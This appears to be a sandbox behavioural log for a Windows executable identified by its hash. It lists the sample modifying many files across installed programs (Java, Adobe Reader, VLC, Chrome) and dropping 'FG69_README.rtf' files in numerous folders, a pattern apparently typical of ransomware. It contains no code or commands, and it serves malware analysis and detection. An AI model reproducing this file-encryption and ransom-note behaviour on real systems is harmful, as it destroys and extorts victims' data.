d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Simferopol d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ja.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\access-bridge-64.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dushanbe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tarawa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\SendInstall.htm d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tunis d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\unpack200.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\London d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fi.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\TextFile.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\MST7MDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\about.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.contexts_1.3.100.v20140407-1019.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin_2.0.100.v20131209-2144.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\desktop.ini d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\is\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.properties d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\jaccess.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_window.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Honolulu d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\cmm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\amd64\jvm.cfg d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\uk.pak d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\notification_plugin.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson_Creek d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\policytool.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\MANIFEST.MF d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\MSBuild\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\DumontDUrville d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\browser\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Form.zip d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+1 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf_3.4.0.v20140827-1444.jar d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\InitializeConvert.docx d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 